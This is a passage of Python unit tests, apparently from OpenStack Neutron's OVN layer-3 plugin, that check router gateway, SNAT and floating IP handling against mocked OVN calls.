'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'},
nexthop='192.168.1.254')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat',
logical_ip='10.0.0.0/24', external_ip='192.168.1.1')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS)
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_change_subnet(self, gr, ur, gs,
grps, gp, mock_get_gw):
self.l3_inst._ovn.is_col_present.return_value = True
mock_get_gw.return_value = [mock.sentinel.GwRoute]
router = {'router': {'name': 'router'}}
fake_old_ext_subnet = {'id': 'old-ext-subnet-id',
'ip_version': 4,
'cidr': '192.168.2.0/24',
'gateway_ip': '192.168.2.254'}
# Old gateway info with same network and different subnet
gr.return_value = copy.copy(self.fake_router_with_ext_gw)
gr.return_value['external_gateway_info'] = {
'network_id': 'ext-network-id',
'external_fixed_ips': [{'ip_address': '192.168.2.1',
'subnet_id': 'old-ext-subnet-id'}]}
gr.return_value['gw_port_id'] = 'old-gw-port-id'
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet,
'old-ext-subnet-id': fake_old_ext_subnet}.get(sid,
self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
# Check deleting old router gateway
self.l3_inst._ovn.delete_lrouter_ext_gw.assert_called_once_with(
'neutron-router-id')
# Check adding new router gateway
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS)
self.del_rev_p.assert_called_once_with(
self.admin_context, 'old-gw-port-id', ovn_const.TYPE_ROUTER_PORTS)
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_change_ip_address(self, gr, ur, gs,
grps, gp, mock_get_gw):
self.l3_inst._ovn.is_col_present.return_value = True
mock_get_gw.return_value = [mock.sentinel.GwRoute]
router = {'router': {'name': 'router'}}
# Old gateway info with same subnet and different ip address
gr_value = copy.deepcopy(self.fake_router_with_ext_gw)
gr_value['external_gateway_info'][
'external_fixed_ips'][0]['ip_address'] = '192.168.1.2'
gr_value['gw_port_id'] = 'old-gw-port-id'
gr.return_value = gr_value
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
# Check deleting old router gateway
self.l3_inst._ovn.delete_lrouter_ext_gw.assert_called_once_with(
'neutron-router-id')
# Check adding new router gateway
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_no_change(self, gr, ur, get_rps):
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_with_ext_gw
ur.return_value = self.fake_router_with_ext_gw
self.l3_inst._ovn.get_lrouter.return_value = (
fake_resources.FakeOVNRouter.from_neutron_router(
self.fake_router_with_ext_gw))
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.lrp_del.assert_not_called()
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
self.l3_inst._ovn.add_lrouter_port.assert_not_called()
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.assert_not_called()
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_v4_network_of_all_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_with_ext_gw_and_disabled_snat(self, gr, ur,
gs, grps, gp):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_without_ext_gw
ur.return_value = self.fake_router_with_ext_gw
ur.return_value['external_gateway_info']['enable_snat'] = False
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
# Need not check lsp and lrp here, it has been tested in other cases
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'},
nexthop='192.168.1.254')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_enable_snat(self, gr, ur, gs, grps, gp):
router = {'router': {'name': 'router'}}
gr.return_value = copy.deepcopy(self.fake_router_with_ext_gw)
gr.return_value['external_gateway_info']['enable_snat'] = False
ur.return_value = self.fake_router_with_ext_gw
self.l3_inst._ovn.get_lrouter.return_value = (
fake_resources.FakeOVNRouter.from_neutron_router(
self.fake_router_with_ext_gw))
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._check_external_ips_changed')
@mock.patch.object(utils, 'get_lrouter_snats')
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.common.ovn.utils.is_snat_enabled',
mock.Mock(return_value=True))
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_disable_snat(self, gr, ur, gs, grps, gp, mock_get_gw, mock_snats,
mock_ext_ips):
mock_get_gw.return_value = [mock.sentinel.GwRoute]
mock_snats.return_value = [mock.sentinel.NAT]
mock_ext_ips.return_value = False
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_with_ext_gw
ur.return_value = copy.deepcopy(self.fake_router_with_ext_gw)
ur.return_value['external_gateway_info']['enable_snat'] = False
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_distributed(self, gf, gp):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gp.return_value = {'mac_address': '00:01:02:03:04:05',
'network_id': 'port-network-id'}
gf.return_value = {'floating_port_id': 'fip-port-id'}
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='dnat_and_snat', logical_ip='10.0.0.10',
external_ip='192.168.0.10', external_mac='00:01:02:03:04:05',
logical_port='port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_distributed_logical_port_down(self, gf, gp):
self.get_a_ctx_mock_p.stop()
# Check that when the port is down, the external_mac field is not
# populated. This falls back to centralized routing for ports that
# are not bound to a chassis.
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.lsp_get_up.return_value.execute.return_value = (
False)
gp.return_value = {'mac_address': '00:01:02:03:04:05'}
gf.return_value = {'floating_port_id': 'fip-port-id'}
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='dnat_and_snat', logical_ip='10.0.0.10',
external_ip='192.168.0.10',
logical_port='port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_external_ip_present_in_nat_rule(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst._ovn.get_lrouter_nat_rules.return_value = [
{'external_ip': '192.168.0.10', 'logical_ip': '10.0.0.6',
'type': 'dnat_and_snat', 'uuid': 'uuid1'}]
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_external_ip_present_type_snat(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst._ovn.get_lrouter_nat_rules.return_value = [
{'external_ip': '192.168.0.10', 'logical_ip': '10.0.0.0/24',
'type': 'snat', 'uuid': 'uuid1'}]
self.l3_inst.create_floatingip(self.context, 'floatingip')
self.l3_inst._ovn.set_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_lsp_external_id(self, gf):
self.get_a_ctx_mock_p.stop()
foo_lport = fake_resources.FakeOvsdbRow.create_one_ovsdb_row()
foo_lport.uuid = 'foo-port'
self.l3_inst._ovn.get_lswitch_port.return_value = foo_lport
self.l3_inst.create_floatingip(self.context, 'floatingip')
calls = [mock.call(
'Logical_Switch_Port',
'foo-port',
('external_ids', {ovn_const.OVN_PORT_FIP_EXT_ID_KEY:
'192.168.0.10'}))]
self.l3_inst._ovn.db_set.assert_has_calls(calls)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_create_floatingip_lb_member_fip(self, gp, gf):
self.get_a_ctx_mock_p.stop()
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
# Stop this mock.
self.mock_is_lb_member_fip.stop()
gp.return_value = self.member_port
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst._ovn.get_lswitch_port.return_value = self.member_lsp
self.l3_inst.create_floatingip(self.context, 'floatingip')
# Validate that there is no external_mac and logical_port while
# setting the NAT entry.
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
external_ip='192.168.0.10',
logical_ip='10.0.0.10',
type='dnat_and_snat')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
def test_create_floatingip_lb_vip_fip(self, gs):
self.get_a_ctx_mock_p.stop()
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
gs.return_value = self.member_subnet
self.l3_inst._ovn.get_lswitch_port.return_value = self.lb_vip_lsp
self.l3_inst._ovn.db_find_rows.return_value.execute.side_effect = [
[self.ovn_lb],
[self.lb_network],
[self.fake_ovn_nat_rule],
]
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst.create_floatingip(self.context, 'floatingip')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
external_ip='192.168.0.10',
external_mac='aa:aa:aa:aa:aa:aa',
logical_ip='10.0.0.10',
logical_port='port_id',
type='dnat_and_snat')
self.l3_inst._ovn.db_find_rows.assert_called_with(
'NAT', ('external_ids', '=', {ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.member_lsp.name}))
# Validate that it clears external_mac/logical_port for member NAT.
self.l3_inst._ovn.db_clear.assert_has_calls([
mock.call('NAT', self.fake_ovn_nat_rule.uuid, 'external_mac'),
mock.call('NAT', self.fake_ovn_nat_rule.uuid, 'logical_port')])
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip(self, df):
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_lb_vip_fip(self, df, gf, gs):
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
gs.return_value = self.member_subnet
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst._ovn.get_lswitch_port.return_value = self.lb_vip_lsp
self.l3_inst._ovn.db_find_rows.return_value.execute.side_effect = [
[self.ovn_lb],
[self.lb_network],
[self.fake_ovn_nat_rule],
]
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
self.l3_inst._ovn.db_find_rows.assert_called_with(
'NAT', ('external_ids', '=',
{ovn_const.OVN_FIP_PORT_EXT_ID_KEY: self.member_lsp.name}))
self.l3_inst._plugin.get_port.assert_called_once_with(
mock.ANY, self.member_lsp.name)
# Validate that it adds external_mac/logical_port back.
self.l3_inst._ovn.db_set.assert_has_calls([
mock.call('NAT', self.fake_ovn_nat_rule.uuid,
('logical_port', self.member_lsp.name)),
mock.call('NAT', self.fake_ovn_nat_rule.uuid,
('external_mac', 'aa:aa:aa:aa:aa:aa'))])
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_lsp_external_id(self, df, gf):
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
foo_lport = fake_resources.FakeOvsdbRow.create_one_ovsdb_row()
foo_lport.uuid = 'foo-port'
foo_lport.external_ids = {
ovn_const.OVN_PORT_FIP_EXT_ID_KEY: 'foo-port'}
self.l3_inst._ovn.get_lswitch_port.return_value = foo_lport
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
calls = [mock.call(
'Logical_Switch_Port', 'foo-port',
'external_ids', ovn_const.OVN_PORT_FIP_EXT_ID_KEY)]
self.l3_inst._ovn.db_remove.assert_has_calls(calls)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_no_lsp_external_id(self, df, gf):
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst._ovn.get_lswitch_port.return_value = None
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.db_remove.assert_not_called()
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_associate(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.fake_floating_ip.update({'fixed_port_id': None})
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_associate_distributed(self, uf, gf, gp, gn):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.fake_floating_ip.update({'fixed_port_id': None})
gp.return_value = {'mac_address': '00:01:02:03:04:05',
'network_id': 'port-network-id'}
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
fake_network_vlan = self.fake_network
fake_network_vlan[pnet.NETWORK_TYPE] = constants.TYPE_FLAT
gn.return_value = fake_network_vlan
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id', type='dnat_and_snat',
logical_ip='10.10.10.10', external_ip='192.168.0.10',
external_mac='00:01:02:03:04:05', logical_port='new-port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_association_empty_update(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.fake_floating_ip.update({'fixed_port_id': 'foo'})
self.fake_floating_ip_new.update({'port_id': 'foo'})
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_reassociate_to_same_port_diff_fixed_ip(
self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.fake_floating_ip_new.update({'port_id': 'port_id',
'fixed_port_id': 'port_id'})
